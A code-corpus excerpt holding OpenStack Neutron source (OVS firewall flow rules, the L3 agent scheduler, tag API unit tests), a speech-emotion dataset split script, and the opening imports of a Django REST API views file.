ct_zone=port.vlan_tag,
actions='normal'
)
self._add_flow(
table=ovs_consts.RULES_EGRESS_TABLE,
priority=40,
reg_port=port.ofport,
ct_state=ovsfw_consts.OF_STATE_NOT_ESTABLISHED,
actions='drop'
)
for ethertype in [constants.ETHERTYPE_IP, constants.ETHERTYPE_IPV6]:
self._add_flow(
table=ovs_consts.RULES_EGRESS_TABLE,
priority=40,
dl_type=ethertype,
reg_port=port.ofport,
ct_state=ovsfw_consts.OF_STATE_ESTABLISHED,
actions="ct(commit,zone=NXM_NX_REG{:d}[0..15],"
"exec(set_field:{:s}->ct_mark))".format(
ovsfw_consts.REG_NET,
ovsfw_consts.CT_MARK_INVALID)
)
def _initialize_ingress_ipv6_icmp(self, port):
for icmp_type in firewall.ICMPV6_ALLOWED_TYPES:
self._add_flow(
table=ovs_consts.BASE_INGRESS_TABLE,
priority=100,
reg_port=port.ofport,
dl_dst=port.mac,
dl_type=constants.ETHERTYPE_IPV6,
nw_proto=lib_const.PROTO_NUM_IPV6_ICMP,
icmp_type=icmp_type,
actions='strip_vlan,output:{:d}'.format(port.ofport),
)
def _initialize_ingress(self, port):
# Allow incoming ARPs
self._add_flow(
table=ovs_consts.BASE_INGRESS_TABLE,
priority=100,
dl_type=constants.ETHERTYPE_ARP,
reg_port=port.ofport,
dl_dst=port.mac,
actions='strip_vlan,output:{:d}'.format(port.ofport),
)
self._initialize_ingress_ipv6_icmp(port)
# DHCP offers
for dl_type, src_port, dst_port in (
(constants.ETHERTYPE_IP, 67, 68),
(constants.ETHERTYPE_IPV6, 547, 546)):
self._add_flow(
table=ovs_consts.BASE_INGRESS_TABLE,
priority=95,
reg_port=port.ofport,
dl_type=dl_type,
nw_proto=lib_const.PROTO_NUM_UDP,
tp_src=src_port,
tp_dst=dst_port,
actions='strip_vlan,output:{:d}'.format(port.ofport),
)
# Track untracked
for dl_type in (constants.ETHERTYPE_IP, constants.ETHERTYPE_IPV6):
self._add_flow(
table=ovs_consts.BASE_INGRESS_TABLE,
priority=90,
reg_port=port.ofport,
dl_type=dl_type,
ct_state=ovsfw_consts.OF_STATE_NOT_TRACKED,
actions='ct(table={:d},zone=NXM_NX_REG{:d}[0..15])'.format(
ovs_consts.RULES_INGRESS_TABLE,
ovsfw_consts.REG_NET)
)
self._add_flow(
table=ovs_consts.BASE_INGRESS_TABLE,
ct_state=ovsfw_consts.OF_STATE_TRACKED,
priority=80,
reg_port=port.ofport,
dl_dst=port.mac,
actions='resubmit(,{:d})'.format(ovs_consts.RULES_INGRESS_TABLE)
)
def _initialize_tracked_ingress(self, port):
# Drop invalid packets
self._add_flow(
table=ovs_consts.RULES_INGRESS_TABLE,
priority=50,
ct_state=ovsfw_consts.OF_STATE_INVALID,
actions='drop'
)
# Drop traffic for removed sg rules
self._add_flow(
table=ovs_consts.RULES_INGRESS_TABLE,
priority=50,
reg_port=port.ofport,
ct_mark=ovsfw_consts.CT_MARK_INVALID,
actions='drop'
)
# Allow established and related connections
for state in (ovsfw_consts.OF_STATE_ESTABLISHED_REPLY,
ovsfw_consts.OF_STATE_RELATED):
self._add_flow(
table=ovs_consts.RULES_INGRESS_TABLE,
priority=50,
dl_dst=port.mac,
reg_port=port.ofport,
ct_state=state,
ct_mark=ovsfw_consts.CT_MARK_NORMAL,
ct_zone=port.vlan_tag,
actions='strip_vlan,output:{:d}'.format(port.ofport)
)
self._add_flow(
table=ovs_consts.RULES_INGRESS_TABLE,
priority=40,
reg_port=port.ofport,
ct_state=ovsfw_consts.OF_STATE_NOT_ESTABLISHED,
actions='drop'
)
for ethertype in [constants.ETHERTYPE_IP, constants.ETHERTYPE_IPV6]:
self._add_flow(
table=ovs_consts.RULES_INGRESS_TABLE,
priority=40,
dl_type=ethertype,
reg_port=port.ofport,
ct_state=ovsfw_consts.OF_STATE_ESTABLISHED,
actions="ct(commit,zone=NXM_NX_REG{:d}[0..15],"
"exec(set_field:{:s}->ct_mark))".format(
ovsfw_consts.REG_NET,
ovsfw_consts.CT_MARK_INVALID)
)
def add_flows_from_rules(self, port):
self._initialize_tracked_ingress(port)
self._initialize_tracked_egress(port)
LOG.debug('Creating flow rules for port %s that is port %d in OVS',
port.id, port.ofport)
rules_generator = self.create_rules_generator_for_port(port)
for rule in rules_generator:
flows = rules.create_flows_from_rule_and_port(rule, port)
LOG.debug("RULGEN: Rules generated for flow %s are %s",
rule, flows)
for flow in flows:
self._accept_flow(**flow)
def create_rules_generator_for_port(self, port):
for sec_group in port.sec_groups:
for rule in sec_group.raw_rules:
yield rule
for rule in sec_group.remote_rules:
remote_group = self.sg_port_map.sec_groups[
rule['remote_group_id']]
for ip_addr in remote_group.get_ethertype_filtered_addresses(
rule['ethertype'], port.fixed_ips):
yield rules.create_rule_for_ip_address(ip_addr, rule)
def delete_all_port_flows(self, port):
"""Delete all flows for given port"""
self._delete_flows(table=ovs_consts.LOCAL_SWITCHING, dl_dst=port.mac)
self._delete_flows(table=ovs_consts.LOCAL_SWITCHING,
in_port=port.ofport)
self._delete_flows(reg_port=port.ofport)
self._delete_flows(table=ovs_consts.ACCEPT_OR_INGRESS_TABLE,
dl_dst=port.mac)
```
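As a quick illustration of the register substitution performed by _replace_register/create_reg_numbers above, here is a small self-contained sketch; the register numbers are assumptions for illustration, since the real values come from ovsfw_consts.REG_PORT and REG_NET:

```python
# Standalone sketch of the register substitution; REG_PORT/REG_NET values
# below are assumptions, not the real ovsfw_consts constants.
REG_PORT = 5
REG_NET = 6

def replace_register(flow_params, register_number, register_value):
    # Move flow_params[register_value] under the 'reg<N>' key, if present.
    try:
        value = flow_params.pop(register_value)
        flow_params['reg{:d}'.format(register_number)] = value
    except KeyError:
        pass

flow = {'table': 0, 'reg_port': 42, 'reg_net': 7, 'actions': 'normal'}
replace_register(flow, REG_PORT, 'reg_port')
replace_register(flow, REG_NET, 'reg_net')
print(flow)  # -> {'table': 0, 'actions': 'normal', 'reg5': 42, 'reg6': 7}
```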
#### File: neutron/scheduler/l3_agent_scheduler.py
```python
import abc
import collections
import functools
import itertools
import random
from neutron_lib import constants as lib_const
from oslo_config import cfg
from oslo_db import exception as db_exc
from oslo_log import log as logging
import six
from sqlalchemy import sql
from neutron._i18n import _LE, _LW
from neutron.common import utils
from neutron.db import api as db_api
from neutron.db import l3_hamode_db
from neutron.db.models import l3 as l3_models
from neutron.db.models import l3agent as rb_model
from neutron.extensions import availability_zone as az_ext
from neutron.extensions import l3
LOG = logging.getLogger(__name__)
cfg.CONF.register_opts(l3_hamode_db.L3_HA_OPTS)
@six.add_metaclass(abc.ABCMeta)
class L3Scheduler(object):
def __init__(self):
self.min_ha_agents = cfg.CONF.min_l3_agents_per_router
self.max_ha_agents = cfg.CONF.max_l3_agents_per_router
@abc.abstractmethod
def schedule(self, plugin, context, router_id,
candidates=None, hints=None):
"""Schedule the router to an active L3 agent.
Schedule the router only if it is not already scheduled.
"""
pass
def _router_has_binding(self, context, router_id, l3_agent_id):
router_binding_model = rb_model.RouterL3AgentBinding
query = context.session.query(router_binding_model)
query = query.filter(router_binding_model.router_id == router_id,
router_binding_model.l3_agent_id == l3_agent_id)
return query.count() > 0
def _filter_unscheduled_routers(self, plugin, context, routers):
"""Filter from list of routers the ones that are not scheduled."""
unscheduled_routers = []
for router in routers:
l3_agents = plugin.get_l3_agents_hosting_routers(
context, [router['id']])
if l3_agents:
LOG.debug('Router %(router_id)s has already been '
'hosted by L3 agent %(agent_id)s',
{'router_id': router['id'],
'agent_id': l3_agents[0]['id']})
else:
unscheduled_routers.append(router)
return unscheduled_routers
def _get_unscheduled_routers(self, plugin, context):
"""Get routers with no agent binding."""
# TODO(gongysh) consider the disabled agent's router
no_agent_binding = ~sql.exists().where(
l3_models.Router.id ==
rb_model.RouterL3AgentBinding.router_id)
query = context.session.query(
l3_models.Router.id).filter(no_agent_binding)
unscheduled_router_ids = [router_id_[0] for router_id_ in query]
if unscheduled_router_ids:
return plugin.get_routers(
context, filters={'id': unscheduled_router_ids})
return []
def _get_routers_to_schedule(self, plugin, context, router_ids=None):
"""Verify that the routers specified need to be scheduled.
:param context: the context
:param plugin: the core plugin
:param router_ids: the list of routers to be checked for scheduling
:returns: the list of routers to be scheduled
"""
if router_ids is not None:
filters = {'id': router_ids}
routers = plugin.get_routers(context, filters=filters)
result = self._filter_unscheduled_routers(plugin, context, routers)
else:
result = self._get_unscheduled_routers(plugin, context)
return [r for r in result
if plugin.router_supports_scheduling(context, r['id'])]
def _get_routers_can_schedule(self, plugin, context, routers, l3_agent):
"""Get the subset of routers that can be scheduled on the L3 agent."""
ids_to_discard = set()
for router in routers:
# check if the l3 agent is compatible with the router
candidates = plugin.get_l3_agent_candidates(
context, router, [l3_agent])
if not candidates:
ids_to_discard.add(router['id'])
return [r for r in routers if r['id'] not in ids_to_discard]
def auto_schedule_routers(self, plugin, context, host, router_ids):
"""Schedule non-hosted routers to L3 Agent running on host.
If router_ids is given, each router in router_ids is scheduled
if it is not scheduled yet. Otherwise all unscheduled routers
are scheduled.
Do not schedule the routers which are hosted already
by active l3 agents.
:returns: True if routers have been successfully assigned to host
"""
l3_agent = plugin.get_enabled_agent_on_host(
context, lib_const.AGENT_TYPE_L3, host)
if not l3_agent:
return
unscheduled_routers = self._get_routers_to_schedule(
plugin, context, router_ids)
if not unscheduled_routers:
if utils.is_extension_supported(
plugin, lib_const.L3_HA_MODE_EXT_ALIAS):
self._schedule_ha_routers_to_additional_agent(
plugin, context, l3_agent)
return
target_routers = self._get_routers_can_schedule(
plugin, context, unscheduled_routers, l3_agent)
if not target_routers:
LOG.warning(_LW('No routers compatible with L3 agent '
'configuration on host %s'), host)
return
self._bind_routers(plugin, context, target_routers, l3_agent)
def _get_candidates(self, plugin, context, sync_router):
"""Return L3 agents where a router could be scheduled."""
with context.session.begin(subtransactions=True):
# Allow a router to be hosted by just one enabled l3 agent, since
# "active" is only a timing issue: a non-active l3 agent can return
# to active at any time.
current_l3_agents = plugin.get_l3_agents_hosting_routers(
context, [sync_router['id']], admin_state_up=True)
if current_l3_agents:
LOG.debug('Router %(router_id)s has already been hosted '
'by L3 agent %(agent_id)s',
{'router_id': sync_router['id'],
'agent_id': current_l3_agents[0]['id']})
return []
active_l3_agents = plugin.get_l3_agents(context, active=True)
if not active_l3_agents:
LOG.warning(_LW('No active L3 agents'))
return []
candidates = plugin.get_l3_agent_candidates(context,
sync_router,
active_l3_agents)
if not candidates:
LOG.warning(_LW('No L3 agents can host the router %s'),
sync_router['id'])
return candidates
def _bind_routers(self, plugin, context, routers, l3_agent):
for router in routers:
if router.get('ha'):
if not self._router_has_binding(context, router['id'],
l3_agent.id):
self.create_ha_port_and_bind(
plugin, context, router['id'],
router['tenant_id'], l3_agent)
else:
self.bind_router(plugin, context, router['id'], l3_agent.id)
@db_api.retry_db_errors
def bind_router(self, plugin, context, router_id, agent_id,
is_manual_scheduling=False, is_ha=False):
"""Bind the router to the l3 agent which has been chosen.
The function tries to create a RouterL3AgentBinding object and add it
to the database. It returns the binding that was created or None if it
failed to create it due to some conflict.
In the HA router case, when creating a RouterL3AgentBinding (with some
binding_index) fails because some other RouterL3AgentBinding was
concurrently created using the same binding_index, then the function
will retry to create an entry with a new binding_index. This creation
will be retried up to db_api.MAX_RETRIES times.
If, still in the HA router case, the creation failed because the
router has already been bound to the l3 agent in question or has been
removed (by a concurrent operation), then no further attempts will be
made and the function will return None.
Note that for non-HA routers, the function will always perform exactly
one try, regardless of the error preventing the addition of a new
RouterL3AgentBinding object to the database.
"""
bindings = context.session.query(
rb_model.RouterL3AgentBinding).filter_by(router_id=router_id)
if bindings.filter_by(l3_agent_id=agent_id).first():
LOG.debug('Router %(router_id)s has already been scheduled '
'to L3 agent %(agent_id)s.',
{'router_id': router_id, 'agent_id': agent_id})
return
if not is_ha:
binding_index = rb_model.LOWEST_BINDING_INDEX
if bindings.filter_by(binding_index=binding_index).first():
LOG.debug('Non-HA router %s has already been scheduled',
router_id)
return
else:
binding_index = plugin.get_vacant_binding_index(
context, router_id, is_manual_scheduling)
if binding_index < rb_model.LOWEST_BINDING_INDEX:
LOG.debug('Unable to find a vacant binding_index for '
'router %(router_id)s and agent %(agent_id)s',
{'router_id': router_id,
'agent_id': agent_id})
return
try:
with context.session.begin(subtransactions=True):
binding = rb_model.RouterL3AgentBinding()
binding.l3_agent_id = agent_id
binding.router_id = router_id
binding.binding_index = binding_index
context.session.add(binding)
LOG.debug('Router %(router_id)s is scheduled to L3 agent '
'%(agent_id)s with binding_index %(binding_index)d',
{'router_id': router_id,
'agent_id': agent_id,
'binding_index': binding_index})
return binding
except db_exc.DBReferenceError:
LOG.debug('Router %s has already been removed '
'by concurrent operation', router_id)
def _schedule_router(self, plugin, context, router_id,
candidates=None):
if not plugin.router_supports_scheduling(context, router_id):
return
sync_router = plugin.get_router(context, router_id)
candidates = candidates or self._get_candidates(
plugin, context, sync_router)
if not candidates:
return
elif sync_router.get('ha', False):
chosen_agents = self._bind_ha_router(plugin, context,
router_id,
sync_router.get('tenant_id'),
candidates)
if not chosen_agents:
return
chosen_agent = chosen_agents[-1]
else:
chosen_agent = self._choose_router_agent(
plugin, context, candidates)
self.bind_router(plugin, context, router_id, chosen_agent.id)
return chosen_agent
@abc.abstractmethod
def _choose_router_agent(self, plugin, context, candidates):
"""Choose an agent from candidates based on a specific policy."""
pass
@abc.abstractmethod
def _choose_router_agents_for_ha(self, plugin, context, candidates):
"""Choose agents from candidates based on a specific policy."""
pass
def _get_num_of_agents_for_ha(self, candidates_count):
return (min(self.max_ha_agents, candidates_count) if self.max_ha_agents
else candidates_count)
def _enough_candidates_for_ha(self, candidates):
if not candidates or len(candidates) < self.min_ha_agents:
LOG.error(_LE("Not enough candidates, a HA router needs at least "
"%s agents"), self.min_ha_agents)
return False
return True
def _add_port_from_net_and_ensure_vr_id(self, plugin, ctxt, router_db,
tenant_id, ha_net):
plugin._ensure_vr_id(ctxt, router_db, ha_net)
return plugin.add_ha_port(ctxt, router_db.id, ha_net.network.id,
tenant_id)
def create_ha_port_and_bind(self, plugin, context, router_id,
tenant_id, agent, is_manual_scheduling=False):
"""Creates and binds a new HA port for this agent."""
ctxt = context.elevated()
router_db = plugin._get_router(ctxt, router_id)
creator = functools.partial(self._add_port_from_net_and_ensure_vr_id,
plugin, ctxt, router_db, tenant_id)
dep_getter = functools.partial(plugin.get_ha_network, ctxt, tenant_id)
dep_creator = functools.partial(plugin._create_ha_network,
ctxt, tenant_id)
dep_deleter = functools.partial(plugin._delete_ha_network, ctxt)
dep_id_attr = 'network_id'
# This might fail in case of concurrent calls, which is good for us
# as we can skip the rest of this function.
binding = self.bind_router(
plugin, context, router_id, agent['id'],
is_manual_scheduling=is_manual_scheduling, is_ha=True)
if not binding:
return
try:
port_binding = utils.create_object_with_dependency(
creator, dep_getter, dep_creator,
dep_id_attr, dep_deleter)[0]
with db_api.autonested_transaction(context.session):
port_binding.l3_agent_id = agent['id']
except db_exc.DBDuplicateEntry:
LOG.debug("Router %(router)s already scheduled for agent "
"%(agent)s", {'router': router_id,
'agent': agent['id']})
except l3.RouterNotFound:
LOG.debug('Router %s has already been removed '
'by concurrent operation', router_id)
def get_ha_routers_l3_agents_counts(self, plugin, context, filters=None):
"""Return a mapping (router, # agents) matching specified filters."""
return plugin.get_ha_routers_l3_agents_count(context)
def _schedule_ha_routers_to_additional_agent(self, plugin, context, agent):
"""Bind already scheduled routers to the agent.
Retrieve the number of agents per router and schedule the router on
the given agent if max_l3_agents_per_router has not yet been reached.
"""
routers_agents = self.get_ha_routers_l3_agents_counts(plugin, context,
agent)
admin_ctx = context.elevated()
underscheduled_routers = [router for router, agents in routers_agents
if (not self.max_ha_agents or
agents < self.max_ha_agents)]
schedulable_routers = self._get_routers_can_schedule(
plugin, admin_ctx, underscheduled_routers, agent)
for router in schedulable_routers:
if not self._router_has_binding(admin_ctx, router['id'],
agent.id):
self.create_ha_port_and_bind(plugin, admin_ctx,
router['id'],
router['tenant_id'],
agent)
def _bind_ha_router(self, plugin, context, router_id,
tenant_id, candidates):
"""Bind a HA router to agents based on a specific policy."""
if not self._enough_candidates_for_ha(candidates):
return
chosen_agents = self._choose_router_agents_for_ha(
plugin, context, candidates)
for agent in chosen_agents:
self.create_ha_port_and_bind(plugin, context, router_id,
tenant_id, agent)
return chosen_agents
class ChanceScheduler(L3Scheduler):
"""Randomly allocate an L3 agent for a router."""
def schedule(self, plugin, context, router_id,
candidates=None):
return self._schedule_router(
plugin, context, router_id, candidates=candidates)
def _choose_router_agent(self, plugin, context, candidates):
return random.choice(candidates)
def _choose_router_agents_for_ha(self, plugin, context, candidates):
num_agents = self._get_num_of_agents_for_ha(len(candidates))
return random.sample(candidates, num_agents)
class LeastRoutersScheduler(L3Scheduler):
"""Allocate to an L3 agent with the least number of routers bound."""
def schedule(self, plugin, context, router_id,
candidates=None):
return self._schedule_router(
plugin, context, router_id, candidates=candidates)
def _choose_router_agent(self, plugin, context, candidates):
candidate_ids = [candidate['id'] for candidate in candidates]
chosen_agent = plugin.get_l3_agent_with_min_routers(
context, candidate_ids)
return chosen_agent
def _choose_router_agents_for_ha(self, plugin, context, candidates):
num_agents = self._get_num_of_agents_for_ha(len(candidates))
ordered_agents = plugin.get_l3_agents_ordered_by_num_routers(
context, [candidate['id'] for candidate in candidates])
return ordered_agents[:num_agents]
class AZLeastRoutersScheduler(LeastRoutersScheduler):
"""Availability zone aware scheduler.
If a router is an HA router, allocate its L3 agents distributed across AZs
according to the router's az_hints.
"""
def _get_az_hints(self, router):
return (router.get(az_ext.AZ_HINTS) or
cfg.CONF.default_availability_zones)
def _get_routers_can_schedule(self, plugin, context, routers, l3_agent):
"""Overwrite L3Scheduler's method to filter by availability zone."""
target_routers = []
for r in routers:
az_hints = self._get_az_hints(r)
if not az_hints or l3_agent['availability_zone'] in az_hints:
target_routers.append(r)
if not target_routers:
return []
return super(AZLeastRoutersScheduler, self)._get_routers_can_schedule(
plugin, context, target_routers, l3_agent)
def _get_candidates(self, plugin, context, sync_router):
"""Overwrite L3Scheduler's method to filter by availability zone."""
all_candidates = (
super(AZLeastRoutersScheduler, self)._get_candidates(
plugin, context, sync_router))
candidates = []
az_hints = self._get_az_hints(sync_router)
for agent in all_candidates:
if not az_hints or agent['availability_zone'] in az_hints:
candidates.append(agent)
return candidates
def get_ha_routers_l3_agents_counts(self, plugin, context, filters=None):
"""Overwrite L3Scheduler's method to filter by availability zone."""
all_routers_agents = (
super(AZLeastRoutersScheduler, self).
get_ha_routers_l3_agents_counts(plugin, context, filters))
if filters is None:
return all_routers_agents
routers_agents = []
for router, agents in all_routers_agents:
az_hints = self._get_az_hints(router)
if az_hints and filters['availability_zone'] not in az_hints:
continue
routers_agents.append((router, agents))
return routers_agents
def _choose_router_agents_for_ha(self, plugin, context, candidates):
ordered_agents = plugin.get_l3_agents_ordered_by_num_routers(
context, [candidate['id'] for candidate in candidates])
num_agents = self._get_num_of_agents_for_ha(len(ordered_agents))
# Order is kept in each az
group_by_az = collections.defaultdict(list)
for agent in ordered_agents:
az = agent['availability_zone']
group_by_az[az].append(agent)
selected_agents = []
for az, agents in itertools.cycle(group_by_az.items()):
if not agents:
continue
selected_agents.append(agents.pop(0))
if len(selected_agents) >= num_agents:
break
return selected_agents
```
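The per-AZ round-robin at the end of AZLeastRoutersScheduler._choose_router_agents_for_ha is easier to see with concrete data. The following standalone sketch uses simplified agent dicts as stand-ins for the objects the plugin would return:

```python
import collections
import itertools

# Agents already ordered by number of hosted routers (fewest first).
ordered_agents = [
    {'id': 'a1', 'availability_zone': 'az1'},
    {'id': 'a2', 'availability_zone': 'az1'},
    {'id': 'b1', 'availability_zone': 'az2'},
    {'id': 'c1', 'availability_zone': 'az3'},
]
num_agents = 3

# Group agents by AZ, keeping the least-loaded ordering inside each AZ.
group_by_az = collections.defaultdict(list)
for agent in ordered_agents:
    group_by_az[agent['availability_zone']].append(agent)

# Cycle over the AZs, taking one agent per AZ per pass, until enough
# agents have been selected.
selected_agents = []
for az, agents in itertools.cycle(group_by_az.items()):
    if not agents:
        continue
    selected_agents.append(agents.pop(0))
    if len(selected_agents) >= num_agents:
        break

print([a['id'] for a in selected_agents])  # -> ['a1', 'b1', 'c1']
```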
#### File: unit/extensions/test_tag.py
```python
from neutron.api import extensions
from neutron.common import config
import neutron.extensions
from neutron.services.tag import tag_plugin
from neutron.tests import fake_notifier
from neutron.tests.unit.db import test_db_base_plugin_v2
extensions_path = ':'.join(neutron.extensions.__path__)
class TestTagApiBase(test_db_base_plugin_v2.NeutronDbPluginV2TestCase):
def setUp(self):
service_plugins = {'TAG': "neutron.services.tag.tag_plugin.TagPlugin"}
super(TestTagApiBase, self).setUp(service_plugins=service_plugins)
plugin = tag_plugin.TagPlugin()
ext_mgr = extensions.PluginAwareExtensionManager(
extensions_path, {'TAG': plugin}
)
app = config.load_paste_app('extensions_test_app')
self.ext_api = extensions.ExtensionMiddleware(app, ext_mgr=ext_mgr)
def _get_resource_tags(self, resource_id):
res = self._show(self.resource, resource_id)
return res[self.member]['tags']
def _put_tag(self, resource_id, tag):
req = self._req('PUT', self.resource, id=resource_id,
subresource='tags', sub_id=tag)
return req.get_response(self.ext_api)
def _put_tags(self, resource_id, tags):
body = {'tags': tags}
req = self._req('PUT', self.resource, data=body, id=resource_id,
subresource='tags')
return req.get_response(self.ext_api)
def _get_tag(self, resource_id, tag):
req = self._req('GET', self.resource, id=resource_id,
subresource='tags', sub_id=tag)
return req.get_response(self.ext_api)
def _delete_tag(self, resource_id, tag):
req = self._req('DELETE', self.resource, id=resource_id,
subresource='tags', sub_id=tag)
return req.get_response(self.ext_api)
def _delete_tags(self, resource_id):
req = self._req('DELETE', self.resource, id=resource_id,
subresource='tags')
return req.get_response(self.ext_api)
def _assertEqualTags(self, expected, actual):
self.assertEqual(set(expected), set(actual))
def _make_query_string(self, tags, tags_any, not_tags, not_tags_any):
filter_strings = []
if tags:
filter_strings.append("tags=" + ','.join(tags))
if tags_any:
filter_strings.append("tags-any=" + ','.join(tags_any))
if not_tags:
filter_strings.append("not-tags=" + ','.join(not_tags))
if not_tags_any:
filter_strings.append("not-tags-any=" + ','.join(not_tags_any))
return '&'.join(filter_strings)
def _get_tags_filter_resources(self, tags=None, tags_any=None,
not_tags=None, not_tags_any=None):
params = self._make_query_string(tags, tags_any, not_tags,
not_tags_any)
req = self._req('GET', self.resource, params=params)
res = req.get_response(self.api)
res = self.deserialize(self.fmt, res)
return res[self.resource]
def _test_notification_report(self, expect_notify):
notify = set(n['event_type'] for n in fake_notifier.NOTIFICATIONS)
duplicated_notify = expect_notify & notify
self.assertEqual(expect_notify, duplicated_notify)
fake_notifier.reset()
class TestNetworkTagApi(TestTagApiBase):
resource = 'networks'
member = 'network'
def test_put_tag(self):
expect_notify = set(['tag.create.start',
'tag.create.end'])
with self.network() as net:
net_id = net['network']['id']
res = self._put_tag(net_id, 'red')
self.assertEqual(201, res.status_int)
tags = self._get_resource_tags(net_id)
self._assertEqualTags(['red'], tags)
self._test_notification_report(expect_notify)
res = self._put_tag(net_id, 'blue')
self.assertEqual(201, res.status_int)
tags = self._get_resource_tags(net_id)
self._assertEqualTags(['red', 'blue'], tags)
self._test_notification_report(expect_notify)
def test_put_tag_exists(self):
with self.network() as net:
net_id = net['network']['id']
res = self._put_tag(net_id, 'blue')
self.assertEqual(201, res.status_int)
res = self._put_tag(net_id, 'blue')
self.assertEqual(201, res.status_int)
def test_put_tags(self):
expect_notify = set(['tag.update.start',
'tag.update.end'])
with self.network() as net:
net_id = net['network']['id']
res = self._put_tags(net_id, ['red', 'green'])
self.assertEqual(200, res.status_int)
tags = self._get_resource_tags(net_id)
self._assertEqualTags(['red', 'green'], tags)
self._test_notification_report(expect_notify)
def test_put_tags_replace(self):
with self.network() as net:
net_id = net['network']['id']
res = self._put_tags(net_id, ['red', 'green'])
self.assertEqual(200, res.status_int)
tags = self._get_resource_tags(net_id)
self._assertEqualTags(['red', 'green'], tags)
res = self._put_tags(net_id, ['blue', 'red'])
self.assertEqual(200, res.status_int)
tags = self._get_resource_tags(net_id)
self._assertEqualTags(['blue', 'red'], tags)
def test_get_tag(self):
with self.network() as net:
net_id = net['network']['id']
res = self._put_tag(net_id, 'red')
self.assertEqual(201, res.status_int)
res = self._get_tag(net_id, 'red')
self.assertEqual(204, res.status_int)
def test_get_tag_notfound(self):
with self.network() as net:
net_id = net['network']['id']
res = self._put_tag(net_id, 'red')
self.assertEqual(201, res.status_int)
res = self._get_tag(net_id, 'green')
self.assertEqual(404, res.status_int)
def test_delete_tag(self):
expect_notify = set(['tag.delete.start',
'tag.delete.end'])
with self.network() as net:
net_id = net['network']['id']
res = self._put_tags(net_id, ['red', 'green'])
self.assertEqual(200, res.status_int)
res = self._delete_tag(net_id, 'red')
self.assertEqual(204, res.status_int)
tags = self._get_resource_tags(net_id)
self._assertEqualTags(['green'], tags)
self._test_notification_report(expect_notify)
def test_delete_tag_notfound(self):
with self.network() as net:
net_id = net['network']['id']
res = self._put_tags(net_id, ['red', 'green'])
self.assertEqual(200, res.status_int)
res = self._delete_tag(net_id, 'blue')
self.assertEqual(404, res.status_int)
def test_delete_tags(self):
expect_notify = set(['tag.delete_all.start',
'tag.delete_all.end'])
with self.network() as net:
net_id = net['network']['id']
res = self._put_tags(net_id, ['red', 'green'])
self.assertEqual(200, res.status_int)
res = self._delete_tags(net_id)
self.assertEqual(204, res.status_int)
tags = self._get_resource_tags(net_id)
self._assertEqualTags([], tags)
self._test_notification_report(expect_notify)
class TestNetworkTagFilter(TestTagApiBase):
resource = 'networks'
member = 'network'
def setUp(self):
super(TestNetworkTagFilter, self).setUp()
self._prepare_network_tags()
def _prepare_network_tags(self):
res = self._make_network(self.fmt, 'net1', True)
net1_id = res['network']['id']
res = self._make_network(self.fmt, 'net2', True)
net2_id = res['network']['id']
res = self._make_network(self.fmt, 'net3', True)
net3_id = res['network']['id']
res = self._make_network(self.fmt, 'net4', True)
net4_id = res['network']['id']
res = self._make_network(self.fmt, 'net5', True)
net5_id = res['network']['id']
self._put_tags(net1_id, ['red'])
self._put_tags(net2_id, ['red', 'blue'])
self._put_tags(net3_id, ['red', 'blue', 'green'])
self._put_tags(net4_id, ['green'])
# net5: no tags
tags = self._get_resource_tags(net5_id)
self._assertEqualTags([], tags)
def _assertEqualResources(self, expected, res):
actual = [n['name'] for n in res]
self.assertEqual(set(expected), set(actual))
def test_filter_tags_single(self):
res = self._get_tags_filter_resources(tags=['red'])
self._assertEqualResources(['net1', 'net2', 'net3'], res)
def test_filter_tags_multi(self):
res = self._get_tags_filter_resources(tags=['red', 'blue'])
self._assertEqualResources(['net2', 'net3'], res)
def test_filter_tags_any_single(self):
res = self._get_tags_filter_resources(tags_any=['blue'])
self._assertEqualResources(['net2', 'net3'], res)
def test_filter_tags_any_multi(self):
res = self._get_tags_filter_resources(tags_any=['red', 'blue'])
self._assertEqualResources(['net1', 'net2', 'net3'], res)
def test_filter_not_tags_single(self):
res = self._get_tags_filter_resources(not_tags=['red'])
self._assertEqualResources(['net4', 'net5'], res)
def test_filter_not_tags_multi(self):
res = self._get_tags_filter_resources(not_tags=['red', 'blue'])
self._assertEqualResources(['net1', 'net4', 'net5'], res)
def test_filter_not_tags_any_single(self):
res = self._get_tags_filter_resources(not_tags_any=['blue'])
self._assertEqualResources(['net1', 'net4', 'net5'], res)
def test_filter_not_tags_any_multi(self):
res = self._get_tags_filter_resources(not_tags_any=['red', 'blue'])
self._assertEqualResources(['net4', 'net5'], res)
``` |
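For reference, this is roughly how the tag filter query strings used by TestNetworkTagFilter are assembled (a standalone sketch of _make_query_string above):

```python
def make_query_string(tags=None, tags_any=None, not_tags=None, not_tags_any=None):
    # Each non-empty filter becomes a comma-separated list; the filters
    # are joined with '&' to form the final query string.
    filter_strings = []
    if tags:
        filter_strings.append("tags=" + ','.join(tags))
    if tags_any:
        filter_strings.append("tags-any=" + ','.join(tags_any))
    if not_tags:
        filter_strings.append("not-tags=" + ','.join(not_tags))
    if not_tags_any:
        filter_strings.append("not-tags-any=" + ','.join(not_tags_any))
    return '&'.join(filter_strings)

print(make_query_string(tags=['red', 'blue'], not_tags_any=['green']))
# -> tags=red,blue&not-tags-any=green
```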
{
"source": "2020-ICT-insdeout/ICT-insideout",
"score": 3
} |
#### File: ICT-insideout/examples/common.py
```python
import numpy as np
from sklearn.model_selection import train_test_split
from utilities_test import get_data, \
get_feature_vector_from_mfcc
_DATA_PATH = '../korean_dataset'
_CLASS_LABELS = ("angry", "disappoint", "fear", "neutral", "sad", "surrender")
def extract_data(flatten):
data, labels = get_data(_DATA_PATH, class_labels=_CLASS_LABELS,
flatten=flatten)
x_train, x_test, y_train, y_test = train_test_split(
data,
labels,
test_size=0.2,
random_state=42)
return np.array(x_train), np.array(x_test), np.array(y_train), np.array(
y_test), len(_CLASS_LABELS)
def get_feature_vector(file_path, flatten):
return get_feature_vector_from_mfcc(file_path, flatten, mfcc_len=39)
``` |
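A minimal sketch of the 80/20 split that extract_data() performs, using toy arrays in place of the real MFCC features (the shapes below are illustrative only):

```python
import numpy as np
from sklearn.model_selection import train_test_split

data = np.arange(20).reshape(10, 2)   # 10 toy "feature vectors"
labels = np.array([0, 1] * 5)         # toy class labels

x_train, x_test, y_train, y_test = train_test_split(
    data, labels, test_size=0.2, random_state=42)

print(x_train.shape, x_test.shape)    # -> (8, 2) (2, 2)
```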
{
"source": "2020lg/project-rest-api",
"score": 3
} |
#### File: project-rest-api/profiles_api/views.py
```python
from rest_framework.views import APIView
from rest_framework.response import Response # the standard Response object that is returned from an APIView
from rest_framework import status
from rest_framework import viewsets
from rest_framework.authentication import TokenAuthentication # token authentication is the type of authentication we use
# for users to authenticate themselves with our API.
